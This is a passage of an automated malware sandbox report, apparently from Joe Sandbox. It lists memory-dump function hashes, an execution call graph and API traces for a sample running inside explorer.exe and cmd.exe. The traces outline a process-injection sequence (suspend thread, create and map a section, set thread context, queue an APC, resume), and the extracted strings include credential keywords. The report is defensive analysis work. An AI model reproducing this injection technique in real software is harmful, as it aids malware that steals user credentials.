                                                                                                                                            • Instruction Fuzzy Hash: 36318F30118B184FC794EFA89494BAAB7E1FFD8300F94462DA94ACB256DF38D509C752
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                            • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction ID: a62ac8105a43d0d2eddbecb1a1349f9a15b9711d1d44abd6eb3c0a969ec946c3
                                                                                                                                            • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                                                                                                                            • Instruction Fuzzy Hash: 6531C231614B0D8FCB44EFA8C8847EDBBE0FB58205F40422AE54EDB251DF7C86498785
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                                                                                                                            • API String ID: 0-319646191
                                                                                                                                            • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction ID: b07e31315d1918633730648ef7e5d815a3705946d0c8fa35aa38cba2ffd936f1
                                                                                                                                            • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                                                                                                                            • Instruction Fuzzy Hash: EC21C170610B0D8ECB05EFE8C8847EDBBA0FF58205F40422AE55ADB251EF7C86098789
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                            • Opcode ID: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                            • Instruction ID: 81165086277899493a086392376072b7cef356a086afea8ea841ffca28fca679
                                                                                                                                            • Opcode Fuzzy Hash: 4d2417001e92a941b72e22f5172d980f9cfaeeee068a4ce0a3e94531502ff258
                                                                                                                                            • Instruction Fuzzy Hash: 9F218B70A24B0D9FDB08EFA8D0447EEBBF0FB58304F50462EE109D7601DB7895558B84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: .$l$l$t
                                                                                                                                            • API String ID: 0-168566397
                                                                                                                                            • Opcode ID: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                            • Instruction ID: a9398a0d3677af976c0bd142b248c88c0000f43f317d33a051015f10221ce246
                                                                                                                                            • Opcode Fuzzy Hash: bb135833945c650cdd1fe89d13a3bf36b2a9c2ee8a1cabd4608026fce5a35201
                                                                                                                                            • Instruction Fuzzy Hash: C5217A70A24B0E9FDB08EFA8D0847AEBAF0FB58304F50462EE109D7611DB7895958B84
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000003.00000002.4182354841.000000000FAD0000.00000040.00000001.00040000.00000000.sdmp, Offset: 0FAD0000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_3_2_fad0000_explorer.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID:
                                                                                                                                            • String ID: auth$logi$pass$user
                                                                                                                                            • API String ID: 0-2393853802
                                                                                                                                            • Opcode ID: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                            • Instruction ID: 4747bf050a949317c84a880a1713ef45ad12518038a6a1f9ebfc62ad502dc6a9
                                                                                                                                            • Opcode Fuzzy Hash: b1bb37e765f9f4b099c2fa6e409a2bcd00c7a79030895f352d0fc3307f2d087a
                                                                                                                                            • Instruction Fuzzy Hash: E421CD30614B0D8FCB05DF9998806EEB7F1EF88344F044619E40AEB246D7B8E9188BC2

                                                                                                                                            Execution Graph

                                                                                                                                            Execution Coverage:1.6%
                                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                                            Signature Coverage:0%
                                                                                                                                            Total number of Nodes:620
                                                                                                                                            Total number of Limit Nodes:67
119530->119528 119531->119529 119533 2f6f42c 119532->119533 119609 2f6b2a0 119533->119609 119535 2f6f43e 119536 2f6f280 3 API calls 119535->119536 119537 2f6f44f 119536->119537 119538 2f6f471 119537->119538 119539 2f6f459 119537->119539 119541 2f6f482 119538->119541 119543 2f7a450 2 API calls 119538->119543 119540 2f6f464 119539->119540 119542 2f7a450 2 API calls 119539->119542 119540->119071 119541->119071 119542->119540 119543->119541 119545 2f6ca96 119544->119545 119546 2f6caa0 119544->119546 119545->119080 119547 2f6af00 LdrLoadDll 119546->119547 119548 2f6cb3e 119547->119548 119549 2f6cb64 119548->119549 119550 2f6b030 LdrLoadDll 119548->119550 119549->119080 119551 2f6cb80 119550->119551 119552 2f74a40 8 API calls 119551->119552 119553 2f6cbd5 119552->119553 119553->119080 119555 2f6d636 119554->119555 119556 2f6b030 LdrLoadDll 119555->119556 119557 2f6d64a 119556->119557 119613 2f6d300 119557->119613 119559 2f6908b 119560 2f6cbf0 119559->119560 119561 2f6cc16 119560->119561 119562 2f6b030 LdrLoadDll 119561->119562 119563 2f6cc99 119561->119563 119562->119563 119564 2f6b030 LdrLoadDll 119563->119564 119565 2f6cd06 119564->119565 119566 2f6af00 LdrLoadDll 119565->119566 119567 2f6cd6f 119566->119567 119568 2f6b030 LdrLoadDll 119567->119568 119569 2f6ce1f 119568->119569 119569->119093 119572 2f68d14 119570->119572 119642 2f6f6c0 119570->119642 119583 2f68f25 119572->119583 119647 2f74390 119572->119647 119574 2f68d70 119574->119583 119650 2f68ab0 119574->119650 119577 2f7cef0 2 API calls 119578 2f68db2 119577->119578 119579 2f7d020 3 API calls 119578->119579 119584 2f68dc7 119579->119584 119580 2f67ea0 3 API calls 119580->119584 119583->119048 119584->119580 119584->119583 119585 2f6c7a0 16 API calls 119584->119585 119586 2f68160 2 API calls 119584->119586 119655 2f6f660 119584->119655 119659 2f6f070 19 API calls 119584->119659 119585->119584 119586->119584 119587->119073 119588->119091 119589->119519 119591 2f6f29a 119590->119591 119599 2f6f350 119590->119599 
119592 2f6b030 LdrLoadDll 119591->119592 119593 2f6f2bc 119592->119593 119600 2f79f00 119593->119600 119595 2f6f2fe 119603 2f79f40 119595->119603 119598 2f7a450 2 API calls 119598->119599 119599->119526 119599->119527 119601 2f7af20 LdrLoadDll 119600->119601 119602 2f79f1c 119601->119602 119602->119595 119604 2f7af20 LdrLoadDll 119603->119604 119605 2f79f5c 119604->119605 119608 3c135c0 LdrInitializeThunk 119605->119608 119606 2f6f344 119606->119598 119608->119606 119610 2f6b2c7 119609->119610 119611 2f6b030 LdrLoadDll 119610->119611 119612 2f6b303 119611->119612 119612->119535 119614 2f6d317 119613->119614 119622 2f6f700 119614->119622 119618 2f6d38b 119619 2f6d392 119618->119619 119633 2f7a260 LdrLoadDll 119618->119633 119619->119559 119621 2f6d3a5 119621->119559 119623 2f6f725 119622->119623 119634 2f681a0 119623->119634 119625 2f6d35f 119630 2f7a6a0 119625->119630 119626 2f74a40 8 API calls 119628 2f6f749 119626->119628 119628->119625 119628->119626 119629 2f7bd80 2 API calls 119628->119629 119641 2f6f540 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 119628->119641 119629->119628 119631 2f7af20 LdrLoadDll 119630->119631 119632 2f7a6bf CreateProcessInternalW 119631->119632 119632->119618 119633->119621 119635 2f6829f 119634->119635 119636 2f681b5 119634->119636 119635->119628 119636->119635 119637 2f74a40 8 API calls 119636->119637 119639 2f68222 119637->119639 119638 2f68249 119638->119628 119639->119638 119640 2f7bd80 2 API calls 119639->119640 119640->119638 119641->119628 119643 2f74e40 LdrLoadDll 119642->119643 119644 2f6f6df 119643->119644 119645 2f6f6e6 SetErrorMode 119644->119645 119646 2f6f6ed 119644->119646 119645->119646 119646->119572 119660 2f6f490 119647->119660 119649 2f743b6 119649->119574 119651 2f7bd00 LdrLoadDll 119650->119651 119652 2f68ad5 119651->119652 119654 2f68cea 119652->119654 119679 2f79840 119652->119679 119654->119577 119656 2f6f673 119655->119656 119727 2f79e50 119656->119727 119659->119584 119661 2f6f4ad 119660->119661 
119667 2f79f80 119661->119667 119663 2f6f4f5 119663->119649 119668 2f7af20 LdrLoadDll 119667->119668 119669 2f79f9c 119668->119669 119677 3c12f30 LdrInitializeThunk 119669->119677 119670 2f6f4ee 119670->119663 119672 2f79fd0 119670->119672 119673 2f7af20 LdrLoadDll 119672->119673 119674 2f79fec 119673->119674 119678 3c12d10 LdrInitializeThunk 119674->119678 119675 2f6f51e 119675->119649 119677->119670 119678->119675 119680 2f7bf50 2 API calls 119679->119680 119681 2f79857 119680->119681 119700 2f69310 119681->119700 119683 2f79872 119684 2f798b0 119683->119684 119685 2f79899 119683->119685 119688 2f7bd00 LdrLoadDll 119684->119688 119686 2f7bd80 2 API calls 119685->119686 119687 2f798a6 119686->119687 119687->119654 119689 2f798ea 119688->119689 119690 2f7bd00 LdrLoadDll 119689->119690 119691 2f79903 119690->119691 119697 2f79ba4 119691->119697 119706 2f7bd40 LdrLoadDll 119691->119706 119693 2f79b89 119694 2f79b90 119693->119694 119693->119697 119695 2f7bd80 2 API calls 119694->119695 119696 2f79b9a 119695->119696 119696->119654 119698 2f7bd80 2 API calls 119697->119698 119699 2f79bf9 119698->119699 119699->119654 119701 2f69335 119700->119701 119702 2f6ace0 LdrLoadDll 119701->119702 119703 2f69368 119702->119703 119705 2f6938d 119703->119705 119707 2f6cf10 119703->119707 119705->119683 119706->119693 119708 2f6cf3c 119707->119708 119709 2f7a1a0 LdrLoadDll 119708->119709 119710 2f6cf55 119709->119710 119711 2f6cf5c 119710->119711 119718 2f7a1e0 119710->119718 119711->119705 119715 2f6cf97 119716 2f7a450 2 API calls 119715->119716 119717 2f6cfba 119716->119717 119717->119705 119719 2f7af20 LdrLoadDll 119718->119719 119720 2f7a1fc 119719->119720 119726 3c12ca0 LdrInitializeThunk 119720->119726 119721 2f6cf7f 119721->119711 119723 2f7a7d0 119721->119723 119724 2f7af20 LdrLoadDll 119723->119724 119725 2f7a7ef 119724->119725 119725->119715 119726->119721 119728 2f7af20 LdrLoadDll 119727->119728 119729 2f79e6c 119728->119729 119732 3c12dd0 LdrInitializeThunk 
119729->119732 119730 2f6f69e 119730->119584 119732->119730 119733 3abcb84 119736 3aba042 119733->119736 119735 3abcba5 119738 3aba06b 119736->119738 119737 3aba56c 119737->119735 119738->119737 119739 3aba182 NtQueryInformationProcess 119738->119739 119741 3aba1ba 119739->119741 119740 3aba1ef 119740->119735 119741->119740 119742 3aba2db 119741->119742 119743 3aba290 119741->119743 119744 3aba2fc NtSuspendThread 119742->119744 119765 3ab9de2 NtCreateSection NtMapViewOfSection NtClose 119743->119765 119745 3aba30d 119744->119745 119748 3aba331 119744->119748 119745->119735 119747 3aba2cf 119747->119735 119750 3aba412 119748->119750 119756 3ab9bb2 119748->119756 119751 3aba531 119750->119751 119753 3aba4a6 NtSetContextThread 119750->119753 119752 3aba552 NtResumeThread 119751->119752 119752->119737 119755 3aba4bd 119753->119755 119754 3aba51c NtQueueApcThread 119754->119751 119755->119751 119755->119754 119757 3ab9bf7 119756->119757 119758 3ab9c66 NtCreateSection 119757->119758 119759 3ab9d4e 119758->119759 119760 3ab9ca0 119758->119760 119759->119750 119761 3ab9cc1 NtMapViewOfSection 119760->119761 119761->119759 119762 3ab9d0c 119761->119762 119762->119759 119763 3ab9d88 119762->119763 119764 3ab9dc5 NtClose 119763->119764 119764->119750 119765->119747

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 03ABA19F
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction ID: 53b793412491884f403311bbf466bef74ec382bc0ef6bbcd8b420a040e69db98
• Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
• Instruction Fuzzy Hash: 10F13F74518A8C8FDBA9EF68C894AEEB7F4FB98304F40462ED44ADB251DF349641CB41

Control-flow Graph

Control-flow graph (edge list not reproduced): basic blocks 3ab9baf-3ab9ddc; calls 3ab9102, 3abb942, 3ab9172, 3abcd62, NtCreateSection, NtMapViewOfSection, NtClose.
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
Similarity
• API ID: Section$CloseCreateView
• String ID: @$@
• API String ID: 1133238012-149943524
• Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction ID: 241f4d8fbf61aee44c3b3e9963fcd366de59719a002ac1f6be6d9db045c6fcf8
• Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
• Instruction Fuzzy Hash: F6616E70618B488FCB58EF68D8856EABBF4FB98314F50062EE58AC3651DB35D441CB86

Control-flow Graph

Control-flow graph (edge list not reproduced): basic blocks 3ab9bb2-3ab9ddc; calls 3ab9102, 3abb942, 3ab9172, 3abcd62, NtCreateSection, NtMapViewOfSection, NtClose.
APIs
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
Similarity
• API ID: Section$CreateView
• String ID: @$@
• API String ID: 1585966358-149943524
• Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction ID: 46642c5447d655e6195366e0fbb53d0ed7fd7c8206d1e65eb77363796bbc09e0
• Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
• Instruction Fuzzy Hash: 6B517E70618B088FD758DF18D8956AABBF4FB88314F50062EE98AC3651DF35D441CB86

Control-flow Graph

APIs
• NtQueryInformationProcess.NTDLL ref: 03ABA19F
Strings
Memory Dump Source
• Source File: 00000004.00000002.4169635220.0000000003AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AB0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_3ab0000_cmd.jbxd
Similarity
• API ID: InformationProcessQuery
• String ID: 0
• API String ID: 1778838933-4108050209
• Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction ID: 1dba94c0735b586130cd7e9156a09a3eb9a88d95c1612663bc0313f8001e4567
• Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
• Instruction Fuzzy Hash: 6E514C70918A8C8FDBA9EF68C8946EEBBF4FB98305F40462ED44AD7211DF309645CB41

Control-flow Graph

Control-flow graph (edge list not reproduced): single basic block 2f7a320-2f7a371; calls 2f7af20, NtCreateFile.
APIs
• NtCreateFile.NTDLL(00000060,00000000,.z`,02F74BA7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02F74BA7,007A002E,00000000,00000060,00000000,00000000), ref: 02F7A36D
Strings
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID: .z`
• API String ID: 823142352-1441809116
• Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction ID: 01ed48b7a1d6a1a8c354ecac814d5f4554c47e8942a6c2a1874da4281205dd9b
• Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
• Instruction Fuzzy Hash: 42F0BDB2200208ABCB08CF88DC84EEB77ADAF8C754F158248FA0D97240C630E8118BA4
APIs
• NtReadFile.NTDLL(02F74D62,5EB65239,FFFFFFFF,02F74A21,?,?,02F74D62,?,02F74A21,FFFFFFFF,5EB65239,02F74D62,?,00000000), ref: 02F7A415
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction ID: bb5b60ff12b9257a639f0f3d8607a657f5a76975d93cdcc1cd006f1a61d5670f
• Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
• Instruction Fuzzy Hash: 6BF0A4B2200208ABCB14DF89DC80EEB77ADAF8C754F158249BA1D97245D630E8118BA0
APIs
• NtClose.NTDLL(02F74D40,?,?,02F74D40,00000000,FFFFFFFF), ref: 02F7A475
Memory Dump Source
• Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
Yara matches
Similarity
• API ID: Close
• String ID:
• API String ID: 3535843008-0
• Opcode ID: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
• Instruction ID: 22500948ff0081af7a292d9430fe9ac833e4938227c0e71a4c8692dabbf283d6
• Opcode Fuzzy Hash: 072bdcd647c6d36830f8f6c12112151eb3ad9b3d11557e58530cd4f796fef379
                                                                                                                                            • Instruction Fuzzy Hash: DDE0C272200204AFDB20DFA8DC88FEB7B68EF44350F15455AFA0CDB282C531E6008B90
                                                                                                                                            APIs
                                                                                                                                            • NtClose.NTDLL(02F74D40,?,?,02F74D40,00000000,FFFFFFFF), ref: 02F7A475
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4168791603.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, Offset: 02F60000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_2f60000_cmd.jbxd
                                                                                                                                            Yara matches
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Close
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 3535843008-0
                                                                                                                                            • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                            • Instruction ID: 91460f49f8baa46e3ef6c5693056b22f397efd48facbc77e62221d6d6ffaeee3
                                                                                                                                            • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                                                                                                                            • Instruction Fuzzy Hash: B5D01776200214ABD710EB98DC85EEB7BADEF48760F154499BA189B282C530FA008AE0
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: b5b27c8ad920a0403b6005404a35a43aaee1d687aed24dc9d4454503153bb901
                                                                                                                                            • Instruction ID: 359b454a9353f38ae25ad34aed61c81062e41fec2393494803f4118f9b185dae
                                                                                                                                            • Opcode Fuzzy Hash: b5b27c8ad920a0403b6005404a35a43aaee1d687aed24dc9d4454503153bb901
                                                                                                                                            • Instruction Fuzzy Hash: 329002A1202614434106B1584415616440A87E0601B56C021E101C590DCA2589916125
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 4bf8edbe36cfe1e8ed5e80aac4993eb6ff9a05b7f4ae263cc0c05f7a84d608ed
                                                                                                                                            • Instruction ID: 238087665e8ec9b4b5fc5d0994690008944888ced97b1bcc36d081a7026125b1
                                                                                                                                            • Opcode Fuzzy Hash: 4bf8edbe36cfe1e8ed5e80aac4993eb6ff9a05b7f4ae263cc0c05f7a84d608ed
                                                                                                                                            • Instruction Fuzzy Hash: 2B900475311714430107F55C07055070447C7D5751357C031F101D550CDF31CD715131
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 76fa670f38bbb51f4e606b5a83996261daab9f643fa2624eca32ba2ad04f98c8
                                                                                                                                            • Instruction ID: e4f46f8431ac797ed12aa611c36b22f755c54b241a0b04c955bb13d55d24f433
                                                                                                                                            • Opcode Fuzzy Hash: 76fa670f38bbb51f4e606b5a83996261daab9f643fa2624eca32ba2ad04f98c8
                                                                                                                                            • Instruction Fuzzy Hash: 21900261211E1482D201B5684C15B07040587D0703F56C115A015C554CCE1589615521
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 2685d7ddf28bc742b35acdd7bc5fc53c19375b329af6e4ec11b80eed3076ce45
                                                                                                                                            • Instruction ID: cd405b4199e8b9aad7615ee9d30f6b2f2c18d31268a500de3887415f30c460fe
                                                                                                                                            • Opcode Fuzzy Hash: 2685d7ddf28bc742b35acdd7bc5fc53c19375b329af6e4ec11b80eed3076ce45
                                                                                                                                            • Instruction Fuzzy Hash: E69002A134161882D101B1584415B060405C7E1701F56C015E106C554D8B19CD526126
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: f58e1d22c504196103be6843a287ff19fe56daefaca0fc4b420da95cae856438
                                                                                                                                            • Instruction ID: f96e1015076d23e1660977fead79d4dd470b565fcc7546bff5150710bda524b1
                                                                                                                                            • Opcode Fuzzy Hash: f58e1d22c504196103be6843a287ff19fe56daefaca0fc4b420da95cae856438
                                                                                                                                            • Instruction Fuzzy Hash: A29002B120161842D141B1584405746040587D0701F56C011A506C554E8B598ED56665
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 2994545307-0
                                                                                                                                            • Opcode ID: 57c3885a1a32c952a289662ed67c2fbfeefa6fb0825dde5650989e41842c0664
                                                                                                                                            • Instruction ID: 872381a1e5a9137f2512db00e460d2482c8ff3431161d46402ae72a1f6069e2a
                                                                                                                                            • Opcode Fuzzy Hash: 57c3885a1a32c952a289662ed67c2fbfeefa6fb0825dde5650989e41842c0664
                                                                                                                                            • Instruction Fuzzy Hash: 64900261242655925546F1584405507440697E0641796C012A141C950C8A269956D621
                                                                                                                                            APIs
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000004.00000002.4169783060.0000000003BA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 03BA0000, based on PE: true
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CC9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003CCD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            • Associated: 00000004.00000002.4169783060.0000000003D3E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_4_2_3ba0000_cmd.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: InitializeThunk
